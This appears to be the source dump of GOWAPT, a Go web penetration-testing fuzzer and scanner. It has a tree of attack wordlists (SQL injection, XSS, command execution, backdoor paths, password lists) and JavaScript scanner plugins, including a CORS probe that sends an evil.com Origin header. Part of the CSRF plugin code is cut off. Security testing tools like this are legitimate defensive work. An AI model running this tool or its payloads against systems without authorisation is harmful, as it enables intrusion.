├── LICENSE ├── Makefile ├── README.md ├── extender └── example.js ├── plugins ├── apache-disc.js ├── cookie-httponly.js ├── cors-policy.js ├── csrf-attack.js └── xss-reflect.js ├── src ├── config.go ├── encoders.go ├── engine.go ├── extender.go ├── filter.go ├── fuzzer.go ├── fuzzmenu.go ├── global.go ├── gowpt.go ├── infomenu.go ├── mainmenu.go ├── print.go ├── scanengine.go ├── scanextender.go └── utils.go └── wordlist ├── Injections ├── All_attack.txt ├── SQL.txt ├── Traversal.txt ├── XML.txt ├── XSS.txt ├── bad_chars.txt └── sqlmap.txt ├── _copyright.txt ├── attack ├── all-attacks │ ├── all-attacks-unix.txt │ ├── all-attacks-win.txt │ └── all-attacks-xplatform.txt ├── business-logic │ ├── CommonDebugParamNames.txt │ ├── CommonMethodNames.txt │ └── DebugParams.Json.fuzz.txt ├── control-chars │ ├── HexValsAllBytes.txt │ ├── NullByteRepresentations.txt │ ├── imessage.txt │ └── terminal-escape-codes.txt ├── disclosure-directory │ └── directory-indexing-generic.txt ├── disclosure-localpaths │ └── unix │ │ └── common-unix-httpd-log-locations.txt ├── disclosure-source │ ├── source-disc-cmd-exec-traversal.txt │ ├── source-disclosure-generic.txt │ └── source-disclosure-microsoft.txt ├── email │ ├── invalid-email-addresses.txt │ └── valid-email-addresses.txt ├── file-upload │ ├── alt-extensions-asp.txt │ ├── alt-extensions-coldfusion.txt │ ├── alt-extensions-jsp.txt │ ├── alt-extensions-perl.txt │ ├── alt-extensions-php.txt │ ├── file-ul-filter-bypass-commonly-writable-directories.txt │ ├── file-ul-filter-bypass-microsoft-asp-filetype-bf.txt │ ├── file-ul-filter-bypass-microsoft-asp.txt │ ├── file-ul-filter-bypass-ms-php.txt │ ├── file-ul-filter-bypass-x-platform-generic.txt │ ├── file-ul-filter-bypass-x-platform-php.txt │ ├── invalid-filenames-linux.txt │ ├── invalid-filenames-microsoft.txt │ ├── invalid-filesystem-chars-microsoft.txt │ ├── invalid-filesystem-chars-osx.txt │ └── malicious-images │ │ ├── POC_img_phpinfo-CR.gif │ │ ├── POC_img_phpinfo-LF-CR.gif │ │ ├── POC_phpinfo-metadata.gif │ │ ├── POC_phpinfo-metadata.jpg │ │ ├── eicar.com.txt │ │ ├── lottapixel.jpg │ │ ├── uber.gif │ │ └── xssproject.swf ├── format-strings │ └── format-strings.txt ├── html_js_fuzz │ ├── HTML5sec_Injections.txt │ ├── html_attributes.txt │ ├── html_tags.txt │ ├── javascript_events.txt │ ├── js_inject.txt │ └── quotationmarks.txt ├── http-protocol │ ├── crlf-injection.txt │ ├── hpp.txt │ ├── http-header-cache-poison.txt │ ├── http-protocol-methods.txt │ ├── http-request-header-field-names.txt │ ├── http-response-header-field-names.txt │ ├── known-uri-types.txt │ └── user-agents.txt ├── integer-overflow │ └── integer-overflows.txt ├── ip │ └── localhost.txt ├── json │ └── JSON_Fuzzing.txt ├── ldap │ └── ldap-injection.txt ├── lfi │ ├── JHADDIX_LFI.txt │ ├── common-ms-httpd-log-locations.txt │ └── common-unix-httpd-log-locations.txt ├── mimetypes │ └── MimeTypes.txt ├── no-sql-injection │ └── mongodb.txt ├── os-cmd-execution │ ├── Commands-Linux.txt │ ├── Commands-OSX.txt │ ├── Commands-Windows.txt │ ├── Commands-WindowsPowershell.txt │ ├── OSCommandInject.Windows.txt │ ├── command-execution-unix.txt │ ├── command-injection-template.txt │ ├── shell-delimiters.txt │ ├── shell-operators.txt │ ├── source-disc-cmd-exec-traversal.txt │ ├── useful-commands-unix.txt │ └── useful-commands-windows.txt ├── os-dir-indexing │ └── directory-indexing.txt ├── path-traversal │ ├── path-traversal-windows.txt │ └── traversals-8-deep-exotic-encoding.txt ├── redirect │ ├── redirect-injection-template.txt │ └── redirect-urls-template.txt ├── rfi │ └── rfi.txt ├── server-side-include │ └── server-side-includes-generic.txt ├── sql-injection │ ├── detect │ │ ├── GenericBlind.txt │ │ ├── Generic_SQLI.txt │ │ ├── MSSQL.txt │ │ ├── MSSQL_blind.txt │ │ ├── MySQL.txt │ │ ├── MySQL_MSSQL.txt │ │ ├── oracle.txt │ │ └── xplatform.txt │ ├── exploit │ │ ├── db2-enumeration.txt │ │ ├── ms-sql-enumeration.txt │ │ ├── mysql-injection-login-bypass.txt │ │ ├── mysql-read-local-files.txt │ │ └── postgres-enumeration.txt │ └── payloads-sql-blind │ │ ├── payloads-sql-blind-MSSQL-INSERT.txt │ │ ├── payloads-sql-blind-MSSQL-WHERE.txt │ │ ├── payloads-sql-blind-MySQL-INSERT.txt │ │ ├── payloads-sql-blind-MySQL-ORDER_BY.txt │ │ └── payloads-sql-blind-MySQL-WHERE.txt ├── string-expansion │ └── shell-expansion.txt ├── unicode │ ├── corrupted.txt │ ├── emoji.txt │ ├── japanese-emoticon.txt │ ├── naughty-unicode.txt │ ├── regionalindicators.txt │ ├── right-to-left.txt │ ├── specialchars.txt │ ├── two-byte-chars.txt │ └── upsidedown.txt ├── xml │ └── xml-attacks.txt ├── xpath │ └── xpath-injection.txt └── xss │ ├── JHADDIX_XSS_WITH_CONTEXT.doc.txt │ ├── XSSPolyglot.txt │ ├── all-encodings-of-lt.txt │ ├── default-javascript-event-attributes.txt │ ├── html-event-attributes.txt │ ├── test.xxe │ ├── xss-other.txt │ ├── xss-rsnake.txt │ └── xss-uri.txt ├── ctfcommon ├── Filenames_PHP_All.txt ├── directory_wordlist.txt └── dirsearch.txt ├── discovery ├── UserAgent │ ├── UserAgentListCommon.txt │ ├── UserAgentListLarge.txt │ └── UserAgents.txt ├── dns │ ├── CcTLD.txt │ ├── alexaTop1mAXFRcommonSubdomains.txt │ ├── dnsmapCommonSubdomains.txt │ └── gTLD.txt └── predictable-filepaths │ ├── KitchensinkDirectories.txt │ ├── Randomfiles.txt │ ├── UnixDotfiles.txt │ ├── backdoors │ ├── ASP_CommonBackdoors.txt │ ├── bot_control_panels.txt │ └── shells.txt │ ├── cgi │ ├── CGI_HTTP_POST.txt │ ├── CGI_HTTP_POST_Windows.txt │ ├── CGI_Microsoft.txt │ └── CGI_XPlatform.txt │ ├── cms │ ├── drupal_plugins.txt │ ├── drupal_themes.txt │ ├── joomla_plugins.txt │ ├── joomla_themes.txt │ ├── php-nuke.txt │ ├── wordpress.txt │ ├── wp_common_theme_files.txt │ ├── wp_plugins.txt │ ├── wp_plugins_top225.txt │ ├── wp_themes.readme │ └── wp_themes.txt │ ├── filename-dirname-bruteforce │ ├── 3CharExtBrute.txt │ ├── CommonWebExtensions.txt │ ├── Extensions.Backup.txt │ ├── Extensions.Common.txt │ ├── Extensions.Compressed.txt │ ├── Extensions.Mostcommon.txt │ ├── Extensions.Skipfish.txt │ ├── WordlistSkipfish.txt │ ├── copy_of.txt │ ├── raft-large-directories-lowercase.txt │ ├── raft-large-directories.txt │ ├── raft-large-extensions-lowercase.txt │ ├── raft-large-extensions.txt │ ├── raft-large-files-lowercase.txt │ ├── raft-large-files.txt │ ├── raft-large-words-lowercase.txt │ ├── raft-large-words.txt │ ├── raft-medium-directories-lowercase.txt │ ├── raft-medium-directories.txt │ ├── raft-medium-extensions-lowercase.txt │ ├── raft-medium-extensions.txt │ ├── raft-medium-files-lowercase.txt │ ├── raft-medium-files.txt │ ├── raft-medium-words-lowercase.txt │ ├── raft-medium-words.txt │ ├── raft-small-directories-lowercase.txt │ ├── raft-small-directories.txt │ ├── raft-small-extensions-lowercase.txt │ ├── raft-small-extensions.txt │ ├── raft-small-files-lowercase.txt │ ├── raft-small-files.txt │ ├── raft-small-words-lowercase.txt │ ├── raft-small-words.txt │ ├── spanish.txt │ ├── test_demo.txt │ └── upload_variants.txt │ ├── login-file-locations │ ├── Logins.txt │ ├── cfm.txt │ ├── html.txt │ ├── jsp.txt │ ├── php.txt │ ├── windows-asp.txt │ └── windows-aspx.txt │ ├── password-file-locations │ └── Passwords.txt │ ├── php │ ├── PHP.txt │ └── PHP_CommonBackdoors.txt │ ├── proxy-conf.txt │ ├── tftp.txt │ ├── webservers-appservers │ ├── ADFS.txt │ ├── AdobeXML.txt │ ├── Apache.txt │ ├── ApacheTomcat.txt │ ├── Apache_Axis.txt │ ├── ColdFusion.txt │ ├── FatwireCMS.txt │ ├── Frontpage.txt │ ├── HP_System_Mgmt_Homepage.txt │ ├── HTTP_POST_Microsoft.txt │ ├── Hyperion.txt │ ├── IIS.txt │ ├── JBoss.txt │ ├── JRun.txt │ ├── JavaServlets_Common.txt │ ├── Joomla_exploitable.txt │ ├── LotusNotes.txt │ ├── Netware.txt │ ├── Oracle9i.txt │ ├── OracleAppServer.txt │ ├── Ruby_Rails.txt │ ├── SAP.txt │ ├── Sharepoint.txt │ ├── SiteMinder.txt │ ├── SunAppServerGlassfish.txt │ ├── SuniPlanet.txt │ ├── Vignette.txt │ ├── Weblogic.txt │ └── Websphere.txt │ └── wellknown-rfc5785.txt ├── general ├── admin-panels.txt ├── big.txt ├── catala.txt ├── common.txt ├── euskera.txt ├── extensions_common.txt ├── http_methods.txt ├── medium.txt ├── megabeast.txt ├── mutations_common.txt ├── spanish.txt └── test.txt ├── others ├── common_pass.txt └── names.txt ├── regex ├── amazon.txt ├── breakpoint-ignores.txt ├── errors.txt ├── nsa-wordlist.txt ├── pii.readme.txt ├── pii.txt └── sessionid.txt ├── stress ├── alphanum_case.txt ├── alphanum_case_extra.txt ├── char.txt ├── doble_uri_hex.txt ├── test_ext.txt └── uri_hex.txt ├── vulns ├── apache.txt ├── cgis.txt ├── coldfusion.txt ├── dirTraversal-nix.txt ├── dirTraversal-win.txt ├── dirTraversal.txt ├── domino.txt ├── fatwire.txt ├── fatwire_pagenames.txt ├── frontpage.txt ├── iis.txt ├── iplanet.txt ├── jrun.txt ├── netware.txt ├── oracle9i.txt ├── sharepoint.txt ├── sql_inj.txt ├── sunas.txt ├── tests.txt ├── tomcat.txt ├── vignette.txt ├── weblogic.txt └── websphere.txt ├── webservices ├── ws-dirs.txt └── ws-files.txt ├── wordlists-misc ├── accidental_profanity.txt ├── common-http-ports.txt ├── numeric.txt ├── us_cities.txt ├── wordlist-alphanumeric-case.txt ├── wordlist-common-snmp-community-strings.txt └── wordlist-dna.txt └── wordlists-user-passwd ├── db2 ├── db2_default_pass.txt ├── db2_default_user.txt └── db2_default_userpass.txt ├── faithwriters.txt ├── generic-listpairs ├── http_default_pass.txt ├── http_default_userpass.txt └── http_default_users.txt ├── names └── namelist.txt ├── oracle ├── _hci_oracle_passwords.txt ├── _oracle_default_passwords.txt ├── oracle_login_password.txt ├── oracle_logins.txt └── oracle_passwords.txt ├── passwds ├── john.txt ├── phpbb.txt ├── twitter.txt └── weaksauce.txt ├── postgres ├── postgres_default_pass.txt ├── postgres_default_user.txt └── postgres_default_userpass.txt ├── readme.txt ├── tomcat ├── tomcat_mgr_default_pass.txt ├── tomcat_mgr_default_userpass.txt └── tomcat_mgr_default_users.txt └── unix-os ├── unix_passwords.txt └── unix_users.txt /Makefile: -------------------------------------------------------------------------------- 1 | # GOWPT - Makefile 2 | # global variables 3 | GO=$(shell which go) 4 | OUTFILE=gowapt 5 | SOURCEDIR=src 6 | INSTALLDIR=/usr/local/bin/ 7 | 8 | 9 | # Do not touch these! 10 | SOURCES := $(shell find $(SOURCEDIR) -name '*.go') 11 | DEPS = github.com/nsf/termbox-go golang.org/x/net/html github.com/robertkrimen/otto github.com/elazarl/goproxy 12 | 13 | gowpt: 14 | $(info Remember to set GOPATH!) 15 | $(info Downloading dependencies $(DEPS)) 16 | $(foreach var,$(DEPS),$(GO) get $(var);) 17 | $(GO) build -ldflags="-s -w" -o $(OUTFILE) $(SOURCES) 18 | 19 | install: 20 | install -m 755 $(OUTFILE) $(INSTALLDIR) 21 | rm -f $(OUTFILE) 22 | 23 | .PHONY: clean 24 | 25 | clean: 26 | rm -f $(OUTFILE) 27 | -------------------------------------------------------------------------------- /extender/example.js: -------------------------------------------------------------------------------- 1 | /* 2 | * Create a custom encoder called helloworld 3 | * 4 | * This encore just add the string "_helloworld" to every payload 5 | * coming from the wordlist 6 | */ 7 | addCustomEncoder("helloworld", myenc); 8 | /* 9 | * Define the callback method for the helloworld encoder 10 | */ 11 | function myenc(data) { 12 | return data + "_helloword"; 13 | } 14 | /* 15 | * Create an HTTP interceptor 16 | * 17 | * The interceptor will hook every request / response 18 | * is possible to modify request before send it, anyway the respose item 19 | * it's just shadow copy of the one received from the server so no modification 20 | * are possible 21 | * 22 | * 23 | * request_response is an object which may contains both http.Request 24 | * or http.Response , to know which on is contained check is_request flag 25 | * 26 | * REMEMBER! request_response is an http.* object so you must interact with 27 | * this one just like you would do in golang! 28 | * 29 | * dumpResponse is a built-in function which dump full request-response to 30 | * disk. 31 | * result is an object filled with stats about the response it contains some fields 32 | * 33 | * result.tags => Number of tags in the response 34 | * result.code => HTTP Response status 35 | * result.words => Number of words in the response 36 | * result.lines => Number of lines in the response 37 | * result.chars => Number of chars in the response 38 | * result.request => Full dump of the request 39 | * result.response => Full dump of the response 40 | * result.response => The injected payload 41 | * 42 | */ 43 | setHTTPInterceptor(function(request_response, result, is_request){ 44 | if(is_request){ 45 | request_response.Header.Set("Hello", "world") 46 | }else{ 47 | dumpResponse(request_response, "/tmp/dump.txt") 48 | /* 49 | * Send an HTTP request in a synchronous way 50 | * 51 | * This API accept 4 parameters: 52 | * method => GET | POST | HEAD | PUT | PATCH | UPDATE 53 | * url => The url of the HTTP service 54 | * post_data => The content of request bodyBytes 55 | * headers => A javascript dictionary {headerName => headerValue} 56 | * 57 | * The response object may be null or undefined or an http.Response from golang 58 | */ 59 | var response = sendRequestSync("GET", "http://example.com/", null, {"Fake": "Header"}) 60 | } 61 | }) 62 | -------------------------------------------------------------------------------- /plugins/apache-disc.js: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Author: DZONERZY 4 | 5 | Apache-Disclosure 6 | 7 | This plugin try to find non standard Apache Server Header 8 | 9 | */ 10 | 11 | apache = Scanner.registerPlugin("Apache-Disc", "Try to check for non standard Apache Server Header", ScanType.RISK_NOT_INVASIVE) 12 | 13 | 14 | function test(base_request){ 15 | vulnerabilities = [] 16 | response = Http.sendRequest(base_request) 17 | server = response.Header.Get("Server") 18 | if(server != "") { 19 | if(String(server).indexOf("Apache") !== -1 && String(server).length > 10){ 20 | vuln = Scanner.makePassedTest( 21 | "Apache diclose information via Server Header", 22 | Utils.httpToString(base_request), 23 | Utils.httpToString(response), 24 | server, 25 | {"name": "Server"}, 26 | Vuln.CONFIDENCE_FIRM, 27 | Severity.INFO, 28 | apache 29 | ) 30 | vulnerabilities.push(vuln) 31 | } 32 | } 33 | return vulnerabilities 34 | } 35 | -------------------------------------------------------------------------------- /plugins/cookie-httponly.js: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Author: DZONERZY 4 | 5 | Cookie-httpOnly 6 | 7 | This plugin try to find non-HttpOnly cookie 8 | 9 | */ 10 | 11 | cookie = Scanner.registerPlugin("Cookie-httpOnly", "Try to check for non httpOnly", ScanType.RISK_NOT_INVASIVE) 12 | 13 | 14 | function test(base_request){ 15 | vulnerabilities = [] 16 | cookieval = Utils.getParameter(base_request,"Cookie") 17 | if(cookieval != null) { 18 | if(String(cookieval.curVal)toLowerCase().indexOf(" httponly") == -1){ 19 | vuln = Scanner.makePassedTest( 20 | "Cookies are not protected against Javascript", 21 | Utils.httpToString(base_request), 22 | "", 23 | cookieval.curValue, 24 | cookieval, 25 | Vuln.CONFIDENCE_FIRM, 26 | Severity.LOW, 27 | cookie 28 | ) 29 | vulnerabilities.push(vuln) 30 | } 31 | } 32 | return vulnerabilities 33 | } 34 | -------------------------------------------------------------------------------- /plugins/cors-policy.js: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Author: DZONERZY 4 | 5 | CORS-Policy 6 | 7 | This plugin try to check for bad CORS policy 8 | 9 | */ 10 | 11 | cors = Scanner.registerPlugin("CORS-Policy", "Try to check for for bad CORS policy", ScanType.RISK_NOT_INVASIVE) 12 | 13 | 14 | function test(base_request){ 15 | vulnerabilities = [] 16 | Utils.addParameter("Origin","http://www.evil.com", Param.POSITION_HEADER, base_request) 17 | response = Http.sendRequest(base_request) 18 | policy = response.Header.Get("Access-Control-Allow-Origin") 19 | if(policy == "*" || policy.indexOf("http://www.evil.com") !== -1) { 20 | vuln = Scanner.makePassedTest( 21 | "Cross domain request are possible due to bad CORS policy", 22 | Utils.httpToString(base_request), 23 | Utils.httpToString(response), 24 | "Access-Control-Allow-Origin: "+policy, 25 | {"name": "CORS"}, 26 | Vuln.CONFIDENCE_CERTAIN, 27 | Severity.HIGH, 28 | cors 29 | ) 30 | vulnerabilities.push(vuln) 31 | } 32 | return vulnerabilities 33 | } 34 | -------------------------------------------------------------------------------- /plugins/csrf-attack.js: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | Author: DZONERZY 4 | 5 | CSRF-Attack 6 | 7 | This plugin try to detect CSRF vulnerable requests 8 | 9 | */ 10 | 11 | csrf = Scanner.registerPlugin("CSRF-Attack", "Try to detect CSRF vulnerable requests", ScanType.RISK_MID_INVASIVE) 12 | 13 | function requestToBody(req){ 14 | response = Http.sendRequest(req) 15 | response_string = Utils.httpToString(response) 16 | response_body = String(response_string).substring(String(response_string).indexOf('\r\n\r\n')+4) 17 | return [response, response_body] 18 | } 19 | 20 | function test(base_request){ 21 | vulnerable = true 22 | vulnerabilities = [] 23 | response = requestToBody(base_request) 24 | all_parameters = Utils.getAllParameters(base_request) 25 | forLoop: 26 | for(var i=0; i"}, 51 | Vuln.CONFIDENCE_POSSIBLE, 52 | Severity.MEDIUM, 53 | csrf 54 | ) 55 | vulnerabilities.push(vuln) 56 | } 57 | return vulnerabilities 58 | } 59 | -------------------------------------------------------------------------------- /src/encoders.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "crypto/md5" 5 | "crypto/sha1" 6 | "crypto/sha256" 7 | "encoding/base32" 8 | "encoding/base64" 9 | "fmt" 10 | ) 11 | 12 | var encoders = map[string]Encoder{} 13 | 14 | func _url(str string) string { 15 | tmp := "" 16 | for _, val := range str { 17 | tmp += fmt.Sprintf("%%%x", val) 18 | } 19 | return tmp 20 | } 21 | 22 | func urlurl(str string) string { 23 | return _url(_url(str)) 24 | } 25 | 26 | func _html(str string) string { 27 | tmp := "" 28 | for _, val := range str { 29 | tmp += fmt.Sprintf("&#%d;", val) 30 | } 31 | return tmp 32 | } 33 | 34 | func htmlhex(str string) string { 35 | tmp := "" 36 | for _, val := range str { 37 | tmp += fmt.Sprintf("&#x%x;", val) 38 | } 39 | return tmp 40 | } 41 | 42 | func unicode(str string) string { 43 | tmp := "" 44 | for _, val := range str { 45 | tmp += fmt.Sprintf("\\u00%x", val) 46 | } 47 | return tmp 48 | } 49 | 50 | func hex(str string) string { 51 | tmp := "" 52 | for _, val := range str { 53 | tmp += fmt.Sprintf("\\x%x", val) 54 | } 55 | return tmp 56 | } 57 | 58 | func md5hash(str string) string { 59 | return fmt.Sprintf("%x", md5.Sum([]byte(str))) 60 | } 61 | 62 | func sha1hash(str string) string { 63 | return fmt.Sprintf("%x", sha1.Sum([]byte(str))) 64 | } 65 | 66 | func sha2hash(str string) string { 67 | return fmt.Sprintf("%x", sha256.Sum256([]byte(str))) 68 | } 69 | 70 | func b64(str string) string { 71 | return base64.StdEncoding.EncodeToString([]byte(str)) 72 | } 73 | 74 | func b32(str string) string { 75 | return base32.StdEncoding.EncodeToString([]byte(str)) 76 | } 77 | 78 | func plain(str string) string { 79 | return str 80 | } 81 | 82 | func initEncoders() { 83 | encoders["url"] = Encoder(_url) 84 | encoders["urlurl"] = Encoder(urlurl) 85 | encoders["html"] = Encoder(_html) 86 | encoders["htmlhex"] = Encoder(htmlhex) 87 | encoders["unicode"] = Encoder(unicode) 88 | encoders["hex"] = Encoder(hex) 89 | encoders["md5hash"] = Encoder(md5hash) 90 | encoders["sha1hash"] = Encoder(sha1hash) 91 | encoders["sha2hash"] = Encoder(sha2hash) 92 | encoders["b64"] = Encoder(b64) 93 | encoders["b32"] = Encoder(b32) 94 | encoders["plain"] = Encoder(plain) 95 | } 96 | -------------------------------------------------------------------------------- /src/extender.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "io/ioutil" 6 | "net/http" 7 | "net/url" 8 | "strings" 9 | 10 | "github.com/robertkrimen/otto" 11 | ) 12 | 13 | func initExtender() { 14 | JSVM.Set("addCustomEncoder", func(name string, f otto.Value) { 15 | encoders[name] = Encoder(func(x string) string { 16 | v, _ := f.Call(otto.NullValue(), x) 17 | sv, _ := v.ToString() 18 | return sv 19 | }) 20 | }) 21 | 22 | JSVM.Set("setHTTPInterceptor", func(f otto.Value) { 23 | haveHTTPInterceptor = true 24 | var v otto.Value 25 | callback := func(x interface{}, y interface{}, b bool) { 26 | if b { 27 | v, _ = f.Call(otto.NullValue(), x, otto.NullValue(), otto.TrueValue()) 28 | } else { 29 | v, _ = f.Call(otto.NullValue(), x, y, otto.FalseValue()) 30 | } 31 | } 32 | HTTPInterceptor = JSHTTPInterceptor(callback) 33 | _ = v 34 | }) 35 | 36 | JSVM.Set("dumpResponse", func(req_resp interface{}, path string) otto.Value { 37 | switch obj := req_resp.(type) { 38 | case *http.Response: 39 | content := response2String(obj) 40 | err := ioutil.WriteFile(path, content, 0644) 41 | if err != nil { 42 | return otto.FalseValue() 43 | } 44 | return otto.TrueValue() 45 | default: 46 | return otto.FalseValue() 47 | } 48 | }) 49 | 50 | JSVM.Set("sendRequestSync", func(method otto.Value, http_url otto.Value, post_data otto.Value, headers interface{}) interface{} { 51 | method_str, m_err := method.ToString() 52 | url_str, u_err := http_url.ToString() 53 | post_str, p_err := post_data.ToString() 54 | if m_err == nil && u_err == nil && p_err == nil { 55 | if post_str != "null" { 56 | post_str = "POST" 57 | } else { 58 | post_str = "" 59 | } 60 | tmp_url, url_err := url.ParseRequestURI(url_str) 61 | tmp_post, post_err := url.ParseQuery(post_str) 62 | tmp_req, req_err := http.NewRequest(method_str, tmp_url.String(), strings.NewReader(tmp_post.Encode())) 63 | if req_err == nil && post_err == nil && url_err == nil { 64 | for v, k := range headers.(map[string]interface{}) { 65 | tmp_req.Header.Add(v, k.(string)) 66 | } 67 | response, err := netClient.Do(tmp_req) 68 | if err == nil { 69 | return response 70 | } else { 71 | return nil 72 | } 73 | } else { 74 | return nil 75 | } 76 | } else { 77 | return nil 78 | } 79 | }) 80 | 81 | JSVM.Set("panic", func(v interface{}) { 82 | panic(fmt.Sprintf("%v", v)) 83 | }) 84 | } 85 | 86 | func runExtension(file string) { 87 | script, _ := ioutil.ReadFile(file) 88 | _, err := JSVM.Run(string(script)) 89 | if err != nil { 90 | fmt.Printf("JS Error: %v\n", err) 91 | badConfig() 92 | } 93 | } 94 | -------------------------------------------------------------------------------- /src/filter.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "os" 6 | "regexp" 7 | "strconv" 8 | ) 9 | 10 | type opMethod func(int, int) bool 11 | 12 | var usefilter = false 13 | 14 | var ops = map[string]opMethod{} 15 | 16 | var vars = map[string]*int{} 17 | 18 | var filter = map[int][]string{} 19 | 20 | func gt(x int, y int) bool { 21 | return x > y 22 | } 23 | 24 | func lt(x int, y int) bool { 25 | return x < y 26 | } 27 | 28 | func eq(x int, y int) bool { 29 | return x == y 30 | } 31 | 32 | func neq(x int, y int) bool { 33 | return x != y 34 | } 35 | 36 | func initFilters(filt string, stats *Stats) { 37 | if filt != "" { 38 | usefilter = true 39 | ops[">"] = opMethod(gt) 40 | ops["<"] = opMethod(lt) 41 | ops["=="] = opMethod(eq) 42 | ops["!="] = opMethod(neq) 43 | vars["chars"] = &stats.chars 44 | vars["code"] = &stats.code 45 | vars["length"] = &stats.length 46 | vars["lines"] = &stats.lines 47 | vars["words"] = &stats.words 48 | vars["tags"] = &stats.tags 49 | var tmp_filter_index = 0 50 | groups := RegSplit(filt, "(&&)") 51 | for _, group := range groups { 52 | r, _ := regexp.Compile("(?P[a-z]+)(\\s{0,100})(?P(<|>|\\|\\||==|!=))(\\s{0,100})(?P[-\\d]+)") 53 | check := r.FindStringSubmatch(group) 54 | if _, ok := vars[check[variable]]; ok { 55 | filter[tmp_filter_index] = append(filter[tmp_filter_index], check[variable]) 56 | filter[tmp_filter_index] = append(filter[tmp_filter_index], check[op]) 57 | filter[tmp_filter_index] = append(filter[tmp_filter_index], check[data]) 58 | tmp_filter_index++ 59 | } else { 60 | fmt.Printf("Error: Filter error, parameter '%s' does not exists.\n", check[variable]) 61 | os.Exit(-1) 62 | } 63 | } 64 | } 65 | } 66 | 67 | func RegSplit(text string, delimeter string) []string { 68 | reg := regexp.MustCompile(delimeter) 69 | indexes := reg.FindAllStringIndex(text, -1) 70 | laststart := 0 71 | result := make([]string, len(indexes)+1) 72 | for i, element := range indexes { 73 | result[i] = text[laststart:element[0]] 74 | laststart = element[1] 75 | } 76 | result[len(indexes)] = text[laststart:len(text)] 77 | return result 78 | } 79 | 80 | func checkFilter() bool { 81 | if !usefilter { 82 | return true 83 | } else { 84 | flag := true 85 | for _, val := range filter { 86 | i, _ := strconv.Atoi(val[2]) 87 | flag = ops[val[1]](*vars[val[0]], i) && flag 88 | } 89 | return flag 90 | } 91 | } 92 | -------------------------------------------------------------------------------- /src/gowpt.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "flag" 5 | 6 | "github.com/nsf/termbox-go" 7 | ) 8 | 9 | func parseCli() Configuration { 10 | var url = flag.String("u", "", "URL to fuzz") 11 | var template = flag.String("t", "", "Template for request") 12 | var postdata = flag.String("d", "", "POST data for request") 13 | var ssl = flag.Bool("ssl", false, "Use SSL") 14 | var wordlist = flag.String("w", "", "Wordlist file") 15 | var usefuzzer = flag.Bool("fuzz", false, "Use the built-in fuzzer") 16 | var filter = flag.String("f", "", "Filter the results") 17 | var threads = flag.Int("threads", 10, "Number of threads") 18 | var encoders = flag.String("e", "plain", "A list of comma separated encoders") 19 | var cookies = flag.String("c", "", "A list of cookies") 20 | var upstream = flag.String("p", "", "Use upstream proxy") 21 | var auth = flag.String("a", "", "Basic authentication (user:password)") 22 | var extension = flag.String("x", "", "Extension file example.js") 23 | var viaproxy = flag.Bool("from-proxy", false, "Get the request via a proxy server") 24 | var scanner = flag.Bool("scanner", false, "Run in scanning mode") 25 | var plugin_dir = flag.String("plugin-dir", "", "Directory containing all scanning module") 26 | flag.Var(&headers, "H", "A list of additional headers") 27 | flag.Parse() 28 | config = Configuration{url: *url, 29 | template: *template, postdata: *postdata, 30 | ssl: *ssl, wordlist: *wordlist, usefuzzer: *usefuzzer, 31 | filter: *filter, threads: *threads, encoders: *encoders, 32 | cookies: *cookies, upstream_proxy: *upstream, auth: *auth, 33 | extension: *extension, headers: headers, from_proxy: *viaproxy, 34 | scanner: *scanner, plugin_dir: *plugin_dir} 35 | config = checkConfig(&config) 36 | return config 37 | } 38 | 39 | func main() { 40 | cfg := parseCli() 41 | if !cfg.scanner { 42 | err := termbox.Init() 43 | if err != nil { 44 | panic(err) 45 | } 46 | defer termbox.Close() 47 | termbox.SetInputMode(termbox.InputEsc) 48 | termbox.SetOutputMode(termbox.Output256) 49 | mainMenu(cfg) 50 | } else { 51 | initScanner(&cfg) 52 | err := termbox.Init() 53 | if err != nil { 54 | panic(err) 55 | } 56 | defer termbox.Close() 57 | termbox.SetInputMode(termbox.InputEsc) 58 | termbox.SetOutputMode(termbox.Output256) 59 | initPrints() 60 | started = true 61 | go startScanEngine(cfg.base_request, &ScannerPlugins) 62 | fuzz_menu_is_fuzz = false 63 | fuzzMenu() 64 | } 65 | } 66 | -------------------------------------------------------------------------------- /src/infomenu.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "github.com/nsf/termbox-go" 5 | ) 6 | 7 | func infoHandleEvents(ev termbox.Event) interface{} { 8 | switch ev.Type { 9 | case termbox.EventError: 10 | panic(ev.Err) 11 | case termbox.EventKey: 12 | if haveCallbackDefined("info", int(ev.Ch)) { 13 | termbox.Clear(termbox.ColorDefault, termbox.ColorDefault) 14 | infoInitTerminal() 15 | return checkCallback("info", int(ev.Ch)) 16 | //termbox.Flush() 17 | } 18 | case termbox.EventResize: 19 | infoInitTerminal() 20 | default: 21 | infoInitTerminal() 22 | } 23 | return nil 24 | } 25 | 26 | func infoInitTerminal() { 27 | termbox.Clear(termbox.ColorDefault, termbox.ColorDefault) 28 | if _, _, correctSize := checkSize(); correctSize { 29 | drawHeader("^7Go Web Application Penetration Test made with ^1❤ ^7by DZONERZY") 30 | drawCenterCenterAlign(termbox.ColorWhite, termbox.ColorDefault, "Go Web Application Pentration Test\n"+ 31 | "made by DZONERZY\n"+ 32 | "GOWAPT is an active WebApp fuzzer\n"+ 33 | "it can be used to check for common/uncommon vulnerabilities\n"+ 34 | "GOWAPT it's more then a scanner, it may help you secure you application\n"+ 35 | "finding and exploitig web application vulnerabilities\n"+ 36 | "GOWAPT is written in Go (Golang) so it's extremely fast and relaiable\n\n"+ 37 | "For info and bug send mail to danielelinguaglossa@gmail.com") 38 | drawFooter("^7[^1Q^7] Quit ^7[^1B^7] Back") 39 | } else { 40 | drawCenterAlign(termbox.ColorRed, termbox.ColorDefault, "Please resize screen") 41 | } 42 | termbox.Flush() 43 | } 44 | 45 | func infoQuit(int) interface{} { 46 | cleanAndExit() 47 | return nil 48 | } 49 | 50 | func infoBack(int) interface{} { 51 | return true 52 | } 53 | 54 | func infoInitHotkeys() { 55 | addCallbackMenu("info", int('q'), callbackMethod(infoQuit)) 56 | addCallbackMenu("info", int('Q'), callbackMethod(infoQuit)) 57 | addCallbackMenu("info", int('b'), callbackMethod(infoBack)) 58 | addCallbackMenu("info", int('B'), 